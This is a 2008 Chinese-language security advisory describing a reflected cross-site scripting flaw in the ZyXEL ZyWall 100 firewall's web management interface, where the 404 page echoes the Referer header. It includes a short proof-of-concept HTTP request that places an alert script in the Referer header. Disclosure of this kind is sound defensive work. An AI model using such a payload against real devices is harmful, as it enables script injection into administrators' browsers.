发布日期：2008-05-08
更新日期：2008-05-09

受影响系统：

ZyXEL ZyWall 100

描述：

---

BUGTRAQ  ID: 29110

Zywall是一款由Zyxel开发和维护的硬件防火墙。

ZyWALL基于Web的管理接口使用referer头生成404 Error页面。如果远程攻击者用特制的referer头请求了不存在的网页的话，应用程序就无法正确地过滤referer头中的数据，导致跨站脚本攻击，在客户端浏览器中执行脚本代码。

<*来源：Deniz CEVIK （Deniz.Cevik@intellect.com.tr）
  
  链接：http://marc.info/?l=bugtraq&m=121026003101940&w=2
        http://secunia.com/advisories/30142/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET /blah.htm HTTP/1.1
Host: www.site.com
Referer: blaaaa"><script>alert(12345)</script>aaaah.htm

建议：

---

厂商补丁：

ZyXEL
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.zyxel.com/index.php

浏览次数：2494
严重程度：0（网友投票）